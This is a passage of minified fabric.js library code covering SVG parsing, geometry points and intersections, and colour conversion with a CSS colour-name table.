RegExp("^\\s*(?:(?:"+Ge+"(?:"+qe+"*"+Ge+")*)?)\\s*$"),lt=new RegExp(Ge,"g");return function(ft){var xe=He.concat(),We=[];if(!ft||ft&&!mt.test(ft))return xe;ft.replace(lt,function(Oe){var Te=new RegExp(Ge).exec(Oe).filter(function(st){return!!st}),Le=Te[1],$e=Te.slice(2).map(parseFloat);switch(Le){case"translate":!function Xe(ft,xe){ft[4]=xe[0],2===xe.length&&(ft[5]=xe[1])}(xe,$e);break;case"rotate":$e[0]=g.util.degreesToRadians($e[0]),function Ie(ft,xe){var We=g.util.cos(xe[0]),Je=g.util.sin(xe[0]),Oe=0,Te=0;3===xe.length&&(Oe=xe[1],Te=xe[2]),ft[0]=We,ft[1]=Je,ft[2]=-Je,ft[3]=We,ft[4]=Oe-(We*Oe-Je*Te),ft[5]=Te-(Je*Oe+We*Te)}(xe,$e);break;case"scale":!function Ae(ft,xe){var Je=2===xe.length?xe[1]:xe[0];ft[0]=xe[0],ft[3]=Je}(xe,$e);break;case"skewX":Ue(xe,$e,2);break;case"skewY":Ue(xe,$e,1);break;case"matrix":xe=$e}We.push(xe.concat()),xe=He.concat()});for(var Je=We[0];We.length>1;)We.shift(),Je=g.util.multiplyTransformMatrices(Je,We[0]);return Je}}();var h=new RegExp("^\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*,?\\s*("+g.reNum+"+)\\s*$");function R(Ie){if(!g.svgViewBoxElementsRegEx.test(Ie.nodeName))return{};var He,Be,qe,De,Ve,ze,Ae=Ie.getAttribute("viewBox"),Ue=1,Xe=1,me=Ie.getAttribute("width"),Ke=Ie.getAttribute("height"),rt=Ie.getAttribute("x")||0,Ge=Ie.getAttribute("y")||0,Qe=Ie.getAttribute("preserveAspectRatio")||"",ht=!Ae||!(Ae=Ae.match(h)),mt=!me||!Ke||"100%"===me||"100%"===Ke,lt=ht&&mt,ft={},xe="",We=0,Je=0;if(ft.width=0,ft.height=0,ft.toBeParsed=lt,ht&&(rt||Ge)&&Ie.parentNode&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+M(rt)+" "+M(Ge)+") ",Ve=(Ie.getAttribute("transform")||"")+xe,Ie.setAttribute("transform",Ve),Ie.removeAttribute("x"),Ie.removeAttribute("y")),lt)return ft;if(ht)return ft.width=M(me),ft.height=M(Ke),ft;if(He=-parseFloat(Ae[1]),Be=-parseFloat(Ae[2]),qe=parseFloat(Ae[3]),De=parseFloat(Ae[4]),ft.minX=He,ft.minY=Be,ft.viewBoxWidth=qe,ft.viewBoxHeight=De,mt?(ft.width=qe,ft.height=De):(ft.width=M(me),ft.height=M(Ke),Ue=ft.width/qe,Xe=ft.height/De),"none"!==(Qe=g.util.parsePreserveAspectRatioAttribute(Qe)).alignX&&("meet"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Xe:Ue),"slice"===Qe.meetOrSlice&&(Xe=Ue=Ue>Xe?Ue:Xe),We=ft.width-qe*Ue,Je=ft.height-De*Ue,"Mid"===Qe.alignX&&(We/=2),"Mid"===Qe.alignY&&(Je/=2),"Min"===Qe.alignX&&(We=0),"Min"===Qe.alignY&&(Je=0)),1===Ue&&1===Xe&&0===He&&0===Be&&0===rt&&0===Ge)return ft;if((rt||Ge)&&"#document"!==Ie.parentNode.nodeName&&(xe=" translate("+M(rt)+" "+M(Ge)+") "),Ve=xe+" matrix("+Ue+" 0 0 "+Xe+" "+(He*Ue+We)+" "+(Be*Xe+Je)+") ","svg"===Ie.nodeName){for(ze=Ie.ownerDocument.createElementNS(g.svgNS,"g");Ie.firstChild;)ze.appendChild(Ie.firstChild);Ie.appendChild(ze)}else(ze=Ie).removeAttribute("x"),ze.removeAttribute("y"),Ve=ze.getAttribute("transform")+Ve;return ze.setAttribute("transform",Ve),ft}function Z(Ie,Ae){var Xe="xlink:href",Be=X(Ie,Ae.getAttribute(Xe).slice(1));if(Be&&Be.getAttribute(Xe)&&Z(Ie,Be),["gradientTransform","x1","x2","y1","y2","gradientUnits","cx","cy","r","fx","fy"].forEach(function(De){Be&&!Ae.hasAttribute(De)&&Be.hasAttribute(De)&&Ae.setAttribute(De,Be.getAttribute(De))}),!Ae.children.length)for(var qe=Be.cloneNode(!0);qe.firstChild;)Ae.appendChild(qe.firstChild);Ae.removeAttribute(Xe)}g.parseSVGDocument=function(Ie,Ae,Ue,Xe){if(Ie){!function L(Ie){for(var Ae=z(Ie,["use","svg:use"]),Ue=0;Ae.length&&Ue<Ae.length;){var Xe=Ae[Ue],He=Xe.getAttribute("xlink:href")||Xe.getAttribute("href");if(null===He)return;var rt,Ge,Qe,ht,Be=He.slice(1),qe=Xe.getAttribute("x")||0,De=Xe.getAttribute("y")||0,Ve=X(Ie,Be).cloneNode(!0),ze=(Ve.getAttribute("transform")||"")+" translate("+qe+", "+De+")",Ke=Ae.length,mt=g.svgNS;if(R(Ve),/^svg$/i.test(Ve.nodeName)){var lt=Ve.ownerDocument.createElementNS(mt,"g");for(Ge=0,ht=(Qe=Ve.attributes).length;Ge<ht;Ge++)rt=Qe.item(Ge),lt.setAttributeNS(mt,rt.nodeName,rt.nodeValue);for(;Ve.firstChild;)lt.appendChild(Ve.firstChild);Ve=lt}for(Ge=0,ht=(Qe=Xe.attributes).length;Ge<ht;Ge++)"x"!==(rt=Qe.item(Ge)).nodeName&&"y"!==rt.nodeName&&"xlink:href"!==rt.nodeName&&"href"!==rt.nodeName&&("transform"===rt.nodeName?ze=rt.nodeValue+" "+ze:Ve.setAttribute(rt.nodeName,rt.nodeValue));Ve.setAttribute("transform",ze),Ve.setAttribute("instantiated_by_use","1"),Ve.removeAttribute("id"),Xe.parentNode.replaceChild(Ve,Xe),Ae.length===Ke&&Ue++}}(Ie);var Be,qe,He=g.Object.__uid++,De=R(Ie),Ve=g.util.toArray(Ie.getElementsByTagName("*"));if(De.crossOrigin=Xe&&Xe.crossOrigin,De.svgUid=He,0===Ve.length&&g.isLikelyNode){var ze=[];for(Be=0,qe=(Ve=Ie.selectNodes('//*[name(.)!="svg"]')).length;Be<qe;Be++)ze[Be]=Ve[Be];Ve=ze}var me=Ve.filter(function(rt){return R(rt),g.svgValidTagNamesRegEx.test(rt.nodeName.replace("svg:",""))&&!function J(Ie,Ae){for(;Ie&&(Ie=Ie.parentNode);)if(Ie.nodeName&&Ae.test(Ie.nodeName.replace("svg:",""))&&!Ie.getAttribute("instantiated_by_use"))return!0;return!1}(rt,g.svgInvalidAncestorsRegEx)});if(!me||me&&!me.length)return void(Ae&&Ae([],{}));var Ke={};Ve.filter(function(rt){return"clipPath"===rt.nodeName.replace("svg:","")}).forEach(function(rt){var Ge=rt.getAttribute("id");Ke[Ge]=g.util.toArray(rt.getElementsByTagName("*")).filter(function(Qe){return g.svgValidTagNamesRegEx.test(Qe.nodeName.replace("svg:",""))})}),g.gradientDefs[He]=g.getGradientDefs(Ie),g.cssRules[He]=g.getCSSRules(Ie),g.clipPaths[He]=Ke,g.parseElements(me,function(rt,Ge){Ae&&(Ae(rt,De,Ge,Ve),delete g.gradientDefs[He],delete g.cssRules[He],delete g.clipPaths[He])},_(De),Ue,Xe)}};var ue=new RegExp("(normal|italic)?\\s*(normal|small-caps)?\\s*(normal|bold|bolder|lighter|100|200|300|400|500|600|700|800|900)?\\s*("+g.reNum+"(?:px|cm|mm|em|pt|pc|in)*)(?:\\/(normal|"+g.reNum+"))?\\s+(.*)");b(g,{parseFontDeclaration:function(Ie,Ae){var Ue=Ie.match(ue);if(Ue){var Xe=Ue[1],He=Ue[3],Be=Ue[4],qe=Ue[5],De=Ue[6];Xe&&(Ae.fontStyle=Xe),He&&(Ae.fontWeight=isNaN(parseFloat(He))?He:parseFloat(He)),Be&&(Ae.fontSize=M(Be)),De&&(Ae.fontFamily=De),qe&&(Ae.lineHeight="normal"===qe?1:qe)}},getGradientDefs:function(Ie){var Xe,Ue=z(Ie,["linearGradient","radialGradient","svg:linearGradient","svg:radialGradient"]),He=0,Be={};for(He=Ue.length;He--;)(Xe=Ue[He]).getAttribute("xlink:href")&&Z(Ie,Xe),Be[Xe.getAttribute("id")]=Xe;return Be},parseAttributes:function(Ie,Ae,Ue){if(Ie){var Xe,Be,qe,He={};void 0===Ue&&(Ue=Ie.getAttribute("svgUid")),Ie.parentNode&&g.svgValidParentsRegEx.test(Ie.parentNode.nodeName)&&(He=g.parseAttributes(Ie.parentNode,Ae,Ue));var De=Ae.reduce(function(Qe,ht){return(Xe=Ie.getAttribute(ht))&&(Qe[ht]=Xe),Qe},{}),Ve=b(function A(Ie,Ae){var Ue={};for(var Xe in g.cssRules[Ae])if(v(Ie,Xe.split(" ")))for(var He in g.cssRules[Ae][Xe])Ue[He]=g.cssRules[Ae][Xe][He];return Ue}(Ie,Ue),g.parseStyleAttribute(Ie));De=b(De,Ve),Ve[ee]&&Ie.setAttribute(ee,Ve[ee]),Be=qe=He.fontSize||g.Text.DEFAULT_SVG_FONT_SIZE,De[K]&&(De[K]=Be=M(De[K],qe));var ze,me,Ke={};for(var rt in De)me=ve(ze=se(rt),De[rt],He,Be),Ke[ze]=me;Ke&&Ke.font&&g.parseFontDeclaration(Ke.font,Ke);var Ge=b(He,Ke);return g.svgValidParentsRegEx.test(Ie.nodeName)?Ge:function ye(Ie){for(var Ae in U)if(void 0!==Ie[U[Ae]]&&""!==Ie[Ae]){if(void 0===Ie[Ae]){if(!g.Object.prototype[Ae])continue;Ie[Ae]=g.Object.prototype[Ae]}if(0!==Ie[Ae].indexOf("url(")){var Ue=new g.Color(Ie[Ae]);Ie[Ae]=Ue.setAlpha(y(Ue.getAlpha()*Ie[U[Ae]],2)).toRgba()}}return Ie}(Ge)}},parseElements:function(Ie,Ae,Ue,Xe,He){new g.ElementsParser(Ie,Ae,Ue,Xe,He).parse()},parseStyleAttribute:function(Ie){var Ae={},Ue=Ie.getAttribute("style");return Ue&&("string"==typeof Ue?function l(Ie,Ae){var Ue,Xe;Ie.replace(/;\s*$/,"").split(";").forEach(function(He){var Be=He.split(":");Ue=Be[0].trim().toLowerCase(),Xe=Be[1].trim(),Ae[Ue]=Xe})}(Ue,Ae):function f(Ie,Ae){for(var He in Ie)void 0!==Ie[He]&&(Ae[He.toLowerCase()]=Ie[He])}(Ue,Ae)),Ae},parsePointsAttribute:function(Ie){if(!Ie)return null;var Ue,Xe,Ae=[];for(Ue=0,Xe=(Ie=(Ie=Ie.replace(/,/g," ").trim()).split(/\s+/)).length;Ue<Xe;Ue+=2)Ae.push({x:parseFloat(Ie[Ue]),y:parseFloat(Ie[Ue+1])});return Ae},getCSSRules:function(Ie){var Ue,Xe,Ae=Ie.getElementsByTagName("style"),He={};for(Ue=0,Xe=Ae.length;Ue<Xe;Ue++){var qe=Ae[Ue].textContent;""!==(qe=qe.replace(/\/\*[\s\S]*?\*\//g,"")).trim()&&qe.split("}").filter(function(De){return De.trim()}).forEach(function(De){var Ve=De.split("{"),ze={},Ke=Ve[1].trim().split(";").filter(function(ht){return ht.trim()});for(Ue=0,Xe=Ke.length;Ue<Xe;Ue++){var rt=Ke[Ue].split(":"),Ge=rt[0].trim(),Qe=rt[1].trim();ze[Ge]=Qe}(De=Ve[0].trim()).split(",").forEach(function(ht){""!==(ht=ht.replace(/^svg/i,"").trim())&&(He[ht]?g.util.object.extend(He[ht],ze):He[ht]=g.util.object.clone(ze))})})}return He},loadSVGFromURL:function(Ie,Ae,Ue,Xe){Ie=Ie.replace(/^\n\s*/,"").trim(),new g.util.request(Ie,{method:"get",onComplete:function He(Be){var qe=Be.responseXML;if(!qe||!qe.documentElement)return Ae&&Ae(null),!1;g.parseSVGDocument(qe.documentElement,function(De,Ve,ze,me){Ae&&Ae(De,Ve,ze,me)},Ue,Xe)}})},loadSVGFromString:function(Ie,Ae,Ue,Xe){var Be=(new g.window.DOMParser).parseFromString(Ie.trim(),"text/xml");g.parseSVGDocument(Be.documentElement,function(qe,De,Ve,ze){Ae(qe,De,Ve,ze)},Ue,Xe)}})}(we),j.ElementsParser=function(E,g,b,_,y,M){this.elements=E,this.callback=g,this.options=b,this.reviver=_,this.svgUid=b&&b.svgUid||0,this.parsingOptions=y,this.regexUrl=/^url\(['"]?#([^'"]+)['"]?\)/g,this.doc=M},function(E){E.parse=function(){this.instances=new Array(this.elements.length),this.numElements=this.elements.length,this.createObjects()},E.createObjects=function(){var g=this;this.elements.forEach(function(b,_){b.setAttribute("svgUid",g.svgUid),g.createObject(b,_)})},E.findTag=function(g){return j[j.util.string.capitalize(g.tagName.replace("svg:",""))]},E.createObject=function(g,b){var _=this.findTag(g);if(_&&_.fromElement)try{_.fromElement(g,this.createCallback(b,g),this.options)}catch(y){j.log(y)}else this.checkIfDone()},E.createCallback=function(g,b){var _=this;return function(y){var M;_.resolveGradient(y,b,"fill"),_.resolveGradient(y,b,"stroke"),y instanceof j.Image&&y._originalElement&&(M=y.parsePreserveAspectRatioAttribute(b)),y._removeTransformMatrix(M),_.resolveClipPath(y,b),_.reviver&&_.reviver(b,y),_.instances[g]=y,_.checkIfDone()}},E.extractPropertyDefinition=function(g,b,_){var y=g[b],M=this.regexUrl;if(M.test(y)){M.lastIndex=0;var p=M.exec(y)[1];return M.lastIndex=0,j[_][this.svgUid][p]}},E.resolveGradient=function(g,b,_){var y=this.extractPropertyDefinition(g,_,"gradientDefs");if(y){var M=b.getAttribute(_+"-opacity"),p=j.Gradient.fromElement(y,g,M,this.options);g.set(_,p)}},E.createClipPathCallback=function(g,b){return function(_){_._removeTransformMatrix(),_.fillRule=_.clipRule,b.push(_)}},E.resolveClipPath=function(g,b){var y,p,D,w,_=this.extractPropertyDefinition(g,"clipPath","clipPaths");if(_){D=[],p=j.util.invertTransform(g.calcTransformMatrix());for(var S=_[0].parentNode,O=b;O.parentNode&&O.getAttribute("clip-path")!==g.clipPath;)O=O.parentNode;O.parentNode.appendChild(S);for(var U=0;U<_.length;U++)this.findTag(y=_[U]).fromElement(y,this.createClipPathCallback(g,D),this.options);_=1===D.length?D[0]:new j.Group(D),w=j.util.multiplyTransformMatrices(p,_.calcTransformMatrix()),_.clipPath&&this.resolveClipPath(_,O);var x=j.util.qrDecompose(w);_.flipX=!1,_.flipY=!1,_.set("scaleX",x.scaleX),_.set("scaleY",x.scaleY),_.angle=x.angle,_.skewX=x.skewX,_.skewY=0,_.setPositionByOrigin({x:x.translateX,y:x.translateY},"center","center"),g.clipPath=_}else delete g.clipPath},E.checkIfDone=function(){0==--this.numElements&&(this.instances=this.instances.filter(function(g){return null!=g}),this.callback(this.instances,this.elements))}}(j.ElementsParser.prototype),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(_,y){this.x=_,this.y=y}g.Point?g.warn("fabric.Point is already defined"):(g.Point=b,b.prototype={type:"point",constructor:b,add:function(_){return new b(this.x+_.x,this.y+_.y)},addEquals:function(_){return this.x+=_.x,this.y+=_.y,this},scalarAdd:function(_){return new b(this.x+_,this.y+_)},scalarAddEquals:function(_){return this.x+=_,this.y+=_,this},subtract:function(_){return new b(this.x-_.x,this.y-_.y)},subtractEquals:function(_){return this.x-=_.x,this.y-=_.y,this},scalarSubtract:function(_){return new b(this.x-_,this.y-_)},scalarSubtractEquals:function(_){return this.x-=_,this.y-=_,this},multiply:function(_){return new b(this.x*_,this.y*_)},multiplyEquals:function(_){return this.x*=_,this.y*=_,this},divide:function(_){return new b(this.x/_,this.y/_)},divideEquals:function(_){return this.x/=_,this.y/=_,this},eq:function(_){return this.x===_.x&&this.y===_.y},lt:function(_){return this.x<_.x&&this.y<_.y},lte:function(_){return this.x<=_.x&&this.y<=_.y},gt:function(_){return this.x>_.x&&this.y>_.y},gte:function(_){return this.x>=_.x&&this.y>=_.y},lerp:function(_,y){return void 0===y&&(y=.5),y=Math.max(Math.min(1,y),0),new b(this.x+(_.x-this.x)*y,this.y+(_.y-this.y)*y)},distanceFrom:function(_){var y=this.x-_.x,M=this.y-_.y;return Math.sqrt(y*y+M*M)},midPointFrom:function(_){return this.lerp(_)},min:function(_){return new b(Math.min(this.x,_.x),Math.min(this.y,_.y))},max:function(_){return new b(Math.max(this.x,_.x),Math.max(this.y,_.y))},toString:function(){return this.x+","+this.y},setXY:function(_,y){return this.x=_,this.y=y,this},setX:function(_){return this.x=_,this},setY:function(_){return this.y=_,this},setFromPoint:function(_){return this.x=_.x,this.y=_.y,this},swap:function(_){var y=this.x,M=this.y;this.x=_.x,this.y=_.y,_.x=y,_.y=M},clone:function(){return new b(this.x,this.y)}})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(_){this.status=_,this.points=[]}g.Intersection?g.warn("fabric.Intersection is already defined"):(g.Intersection=b,g.Intersection.prototype={constructor:b,appendPoint:function(_){return this.points.push(_),this},appendPoints:function(_){return this.points=this.points.concat(_),this}},g.Intersection.intersectLineLine=function(_,y,M,p){var D,w=(p.x-M.x)*(_.y-M.y)-(p.y-M.y)*(_.x-M.x),x=(y.x-_.x)*(_.y-M.y)-(y.y-_.y)*(_.x-M.x),S=(p.y-M.y)*(y.x-_.x)-(p.x-M.x)*(y.y-_.y);if(0!==S){var O=w/S,U=x/S;0<=O&&O<=1&&0<=U&&U<=1?(D=new b("Intersection")).appendPoint(new g.Point(_.x+O*(y.x-_.x),_.y+O*(y.y-_.y))):D=new b}else D=new b(0===w||0===x?"Coincident":"Parallel");return D},g.Intersection.intersectLinePolygon=function(_,y,M){var S,O,p=new b,D=M.length;for(O=0;O<D;O++)S=b.intersectLineLine(_,y,M[O],M[(O+1)%D]),p.appendPoints(S.points);return p.points.length>0&&(p.status="Intersection"),p},g.Intersection.intersectPolygonPolygon=function(_,y){var D,M=new b,p=_.length;for(D=0;D<p;D++){var S=b.intersectLinePolygon(_[D],_[(D+1)%p],y);M.appendPoints(S.points)}return M.points.length>0&&(M.status="Intersection"),M},g.Intersection.intersectPolygonRectangle=function(_,y,M){var p=y.min(M),D=y.max(M),w=new g.Point(D.x,p.y),x=new g.Point(p.x,D.y),S=b.intersectLinePolygon(p,w,_),O=b.intersectLinePolygon(w,D,_),U=b.intersectLinePolygon(D,x,_),K=b.intersectLinePolygon(x,p,_),ee=new b;return ee.appendPoints(S.points),ee.appendPoints(O.points),ee.appendPoints(U.points),ee.appendPoints(K.points),ee.points.length>0&&(ee.status="Intersection"),ee})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={});function b(y){y?this._tryParsingColor(y):this.setSource([0,0,0,1])}function _(y,M,p){return p<0&&(p+=1),p>1&&(p-=1),p<1/6?y+6*(M-y)*p:p<.5?M:p<2/3?y+(M-y)*(2/3-p)*6:y}g.Color?g.warn("fabric.Color is already defined."):(g.Color=b,g.Color.prototype={_tryParsingColor:function(y){var M;y in b.colorNameMap&&(y=b.colorNameMap[y]),"transparent"===y&&(M=[255,255,255,0]),M||(M=b.sourceFromHex(y)),M||(M=b.sourceFromRgb(y)),M||(M=b.sourceFromHsl(y)),M||(M=[0,0,0,1]),M&&this.setSource(M)},_rgbToHsl:function(y,M,p){var D,w,x,S=g.util.array.max([y/=255,M/=255,p/=255]),O=g.util.array.min([y,M,p]);if(x=(S+O)/2,S===O)D=w=0;else{var U=S-O;switch(w=x>.5?U/(2-S-O):U/(S+O),S){case y:D=(M-p)/U+(M<p?6:0);break;case M:D=(p-y)/U+2;break;case p:D=(y-M)/U+4}D/=6}return[Math.round(360*D),Math.round(100*w),Math.round(100*x)]},getSource:function(){return this._source},setSource:function(y){this._source=y},toRgb:function(){var y=this.getSource();return"rgb("+y[0]+","+y[1]+","+y[2]+")"},toRgba:function(){var y=this.getSource();return"rgba("+y[0]+","+y[1]+","+y[2]+","+y[3]+")"},toHsl:function(){var y=this.getSource(),M=this._rgbToHsl(y[0],y[1],y[2]);return"hsl("+M[0]+","+M[1]+"%,"+M[2]+"%)"},toHsla:function(){var y=this.getSource(),M=this._rgbToHsl(y[0],y[1],y[2]);return"hsla("+M[0]+","+M[1]+"%,"+M[2]+"%,"+y[3]+")"},toHex:function(){var M,p,D,y=this.getSource();return M=1===(M=y[0].toString(16)).length?"0"+M:M,p=1===(p=y[1].toString(16)).length?"0"+p:p,D=1===(D=y[2].toString(16)).length?"0"+D:D,M.toUpperCase()+p.toUpperCase()+D.toUpperCase()},toHexa:function(){var M,y=this.getSource();return M=1===(M=(M=Math.round(255*y[3])).toString(16)).length?"0"+M:M,this.toHex()+M.toUpperCase()},getAlpha:function(){return this.getSource()[3]},setAlpha:function(y){var M=this.getSource();return M[3]=y,this.setSource(M),this},toGrayscale:function(){var y=this.getSource(),M=parseInt((.3*y[0]+.59*y[1]+.11*y[2]).toFixed(0),10);return this.setSource([M,M,M,y[3]]),this},toBlackWhite:function(y){var M=this.getSource(),p=(.3*M[0]+.59*M[1]+.11*M[2]).toFixed(0),D=M[3];return y=y||127,p=Number(p)<Number(y)?0:255,this.setSource([p,p,p,D]),this},overlayWith:function(y){y instanceof b||(y=new b(y));var S,M=[],p=this.getAlpha(),w=this.getSource(),x=y.getSource();for(S=0;S<3;S++)M.push(Math.round(.5*w[S]+.5*x[S]));return M[3]=p,this.setSource(M),this}},g.Color.reRGBa=/^rgba?\(\s*(\d{1,3}(?:\.\d+)?\%?)\s*,\s*(\d{1,3}(?:\.\d+)?\%?)\s*,\s*(\d{1,3}(?:\.\d+)?\%?)\s*(?:\s*,\s*((?:\d*\.?\d+)?)\s*)?\)$/i,g.Color.reHSLa=/^hsla?\(\s*(\d{1,3})\s*,\s*(\d{1,3}\%)\s*,\s*(\d{1,3}\%)\s*(?:\s*,\s*(\d+(?:\.\d+)?)\s*)?\)$/i,g.Color.reHex=/^#?([0-9a-f]{8}|[0-9a-f]{6}|[0-9a-f]{4}|[0-9a-f]{3})$/i,g.Color.colorNameMap={aliceblue:"#F0F8FF",antiquewhite:"#FAEBD7",aqua:"#00FFFF",aquamarine:"#7FFFD4",azure:"#F0FFFF",beige:"#F5F5DC",bisque:"#FFE4C4",black:"#000000",blanchedalmond:"#FFEBCD",blue:"#0000FF",blueviolet:"#8A2BE2",brown:"#A52A2A",burlywood:"#DEB887",cadetblue:"#5F9EA0",chartreuse:"#7FFF00",chocolate:"#D2691E",coral:"#FF7F50",cornflowerblue:"#6495ED",cornsilk:"#FFF8DC",crimson:"#DC143C",cyan:"#00FFFF",darkblue:"#00008B",darkcyan:"#008B8B",darkgoldenrod:"#B8860B",darkgray:"#A9A9A9",darkgrey:"#A9A9A9",darkgreen:"#006400",darkkhaki:"#BDB76B",darkmagenta:"#8B008B",darkolivegreen:"#556B2F",darkorange:"#FF8C00",darkorchid:"#9932CC",darkred:"#8B0000",darksalmon:"#E9967A",darkseagreen:"#8FBC8F",darkslateblue:"#483D8B",darkslategray:"#2F4F4F",darkslategrey:"#2F4F4F",darkturquoise:"#00CED1",darkviolet:"#9400D3",deeppink:"#FF1493",deepskyblue:"#00BFFF",dimgray:"#696969",dimgrey:"#696969",dodgerblue:"#1E90FF",firebrick:"#B22222",floralwhite:"#FFFAF0",forestgreen:"#228B22",fuchsia:"#FF00FF",gainsboro:"#DCDCDC",ghostwhite:"#F8F8FF",gold:"#FFD700",goldenrod:"#DAA520",gray:"#808080",grey:"#808080",green:"#008000",greenyellow:"#ADFF2F",honeydew:"#F0FFF0",hotpink:"#FF69B4",indianred:"#CD5C5C",indigo:"#4B0082",ivory:"#FFFFF0",khaki:"#F0E68C",lavender:"#E6E6FA",lavenderblush:"#FFF0F5",lawngreen:"#7CFC00",lemonchiffon:"#FFFACD",lightblue:"#ADD8E6",lightcoral:"#F08080",lightcyan:"#E0FFFF",lightgoldenrodyellow:"#FAFAD2",lightgray:"#D3D3D3",lightgrey:"#D3D3D3",lightgreen:"#90EE90",lightpink:"#FFB6C1",lightsalmon:"#FFA07A",lightseagreen:"#20B2AA",lightskyblue:"#87CEFA",lightslategray:"#778899",lightslategrey:"#778899",lightsteelblue:"#B0C4DE",lightyellow:"#FFFFE0",lime:"#00FF00",limegreen:"#32CD32",linen:"#FAF0E6",magenta:"#FF00FF",maroon:"#800000",mediumaquamarine:"#66CDAA",mediumblue:"#0000CD",mediumorchid:"#BA55D3",mediumpurple:"#9370DB",mediumseagreen:"#3CB371",mediumslateblue:"#7B68EE",mediumspringgreen:"#00FA9A",mediumturquoise:"#48D1CC",mediumvioletred:"#C71585",midnightblue:"#191970",mintcream:"#F5FFFA",mistyrose:"#FFE4E1",moccasin:"#FFE4B5",navajowhite:"#FFDEAD",navy:"#000080",oldlace:"#FDF5E6",olive:"#808000",olivedrab:"#6B8E23",orange:"#FFA500",orangered:"#FF4500",orchid:"#DA70D6",palegoldenrod:"#EEE8AA",palegreen:"#98FB98",paleturquoise:"#AFEEEE",palevioletred:"#DB7093",papayawhip:"#FFEFD5",peachpuff:"#FFDAB9",peru:"#CD853F",pink:"#FFC0CB",plum:"#DDA0DD",powderblue:"#B0E0E6",purple:"#800080",rebeccapurple:"#663399",red:"#FF0000",rosybrown:"#BC8F8F",royalblue:"#4169E1",saddlebrown:"#8B4513",salmon:"#FA8072",sandybrown:"#F4A460",seagreen:"#2E8B57",seashell:"#FFF5EE",sienna:"#A0522D",silver:"#C0C0C0",skyblue:"#87CEEB",slateblue:"#6A5ACD",slategray:"#708090",slategrey:"#708090",snow:"#FFFAFA",springgreen:"#00FF7F",steelblue:"#4682B4",tan:"#D2B48C",teal:"#008080",thistle:"#D8BFD8",tomato:"#FF6347",turquoise:"#40E0D0",violet:"#EE82EE",wheat:"#F5DEB3",white:"#FFFFFF",whitesmoke:"#F5F5F5",yellow:"#FFFF00",yellowgreen:"#9ACD32"},g.Color.fromRgb=function(y){return b.fromSource(b.sourceFromRgb(y))},g.Color.sourceFromRgb=function(y){var M=y.match(b.reRGBa);if(M){var p=parseInt(M[1],10)/(/%$/.test(M[1])?100:1)*(/%$/.test(M[1])?255:1),D=parseInt(M[2],10)/(/%$/.test(M[2])?100:1)*(/%$/.test(M[2])?255:1),w=parseInt(M[3],10)/(/%$/.test(M[3])?100:1)*(/%$/.test(M[3])?255:1);return[parseInt(p,10),parseInt(D,10),parseInt(w,10),M[4]?parseFloat(M[4]):1]}},g.Color.fromRgba=b.fromRgb,g.Color.fromHsl=function(y){return b.fromSource(b.sourceFromHsl(y))},g.Color.sourceFromHsl=function(y){var M=y.match(b.reHSLa);if(M){var x,S,O,p=(parseFloat(M[1])%360+360)%360/360,D=parseFloat(M[2])/(/%$/.test(M[2])?100:1),w=parseFloat(M[3])/(/%$/.test(M[3])?100:1);if(0===D)x=S=O=w;else{var U=w<=.5?w*(D+1):w+D-w*D,K=2*w-U;x=_(K,U,p+1/3),S=_(K,U,p),O=_(K,U,p-1/3)}return[Math.round(255*x),Math.round(255*S),Math.round(255*O),M[4]?parseFloat(M[4]):1]}},g.Color.fromHsla=b.fromHsl,g.Color.fromHex=function(y){return b.fromSource(b.sourceFromHex(y))},g.Color.sourceFromHex=function(y){if(y.match(b.reHex)){var M=y.slice(y.indexOf("#")+1),p=3===M.length||4===M.length,D=8===M.length||4===M.length,w=p?M.charAt(0)+M.charAt(0):M.substring(0,2),x=p?M.charAt(1)+M.charAt(1):M.substring(2,4),S=p?M.charAt(2)+M.charAt(2):M.substring(4,6),O=D?p?M.charAt(3)+M.charAt(3):M.substring(6,8):"FF";return[parseInt(w,16),parseInt(x,16),parseInt(S,16),parseFloat((parseInt(O,16)/255).toFixed(2))]}},g.Color.fromSource=function(y){var M=new b;return M.setSource(y),M})}(we),function(E){"use strict";var g=E.fabric||(E.fabric={}),b=["e","se","s","sw","w","nw","n","ne","e"],_=["ns","nesw","ew","nwse"],y={},M="left",p="top",D="right",w="bottom",x="center",S={top:w,bottom:p,left:D,right:M,center:x},O=g.util.radiansToDegrees,U=Math.sign||function(ze){return(ze>0)-(ze<0)||+ze};function K(ze,me){var Ke=ze.angle+O(Math.atan2(me.y,me.x))+360;return Math.round(Ke%360/45)}function ee(ze,me){var Ke=me.transform.target,rt=Ke.canvas,Ge=g.util.object.clone(me);Ge.target=Ke,rt&&rt.fire("object:"+ze,Ge),Ke.fire(ze,me)}function se(ze,me){var Ke=me.canvas,Ge=ze[Ke.uniScaleKey];return Ke.uniformScaling&&!Ge||!Ke.uniformScaling&&Ge}function ve(ze){return ze.originX===x&&ze.originY===x}function le(ze,me,Ke){var rt=ze.lockScalingX,Ge=ze.lockScalingY;return!!(rt&&Ge||!me&&(rt||Ge)&&Ke||rt&&"x"===me||Ge&&"y"===me)}function v(ze,me,Ke,rt){return{e:ze,transform:me,pointer:{x:Ke,y:rt}}}function P(ze){return function(me,Ke,rt,Ge){var Qe=Ke.target,ht=Qe.getCenterPoint(),mt=Qe.translateToOriginPoint(ht,Ke.originX,Ke.originY),lt=ze(me,Ke,rt,Ge);return Qe.setPositionByOrigin(mt,Ke.originX,Ke.originY),lt}}function G(ze,me){return function(Ke,rt,Ge,Qe){var ht=me(Ke,rt,Ge,Qe);return ht&&ee(ze,v(Ke,rt,Ge,Qe)),ht}}function X(ze,me,Ke,rt,Ge){var Qe=ze.target,ht=Qe.controls[ze.corner],mt=Qe.canvas.getZoom(),lt=Qe.padding/mt,ft=Qe.toLocalPoint(new g.Point(rt,Ge),me,Ke);return ft.x>=lt&&(ft.x-=lt),ft.x<=-lt&&(ft.x+=lt),ft.y>=lt&&(ft.y-=lt),ft.y<=lt&&(ft.y+=lt),ft.x-=ht.offsetX,ft.y-=ht.offsetY,ft}function L(ze){return ze.flipX!==ze.flipY}function h(ze,me,Ke,rt,Ge){if(0!==ze[me]){var Qe=ze._getTransformedDimensions()[rt];ze.set(Ke,Ge/Qe*ze[Ke])}}function R(ze,me,Ke,rt){var 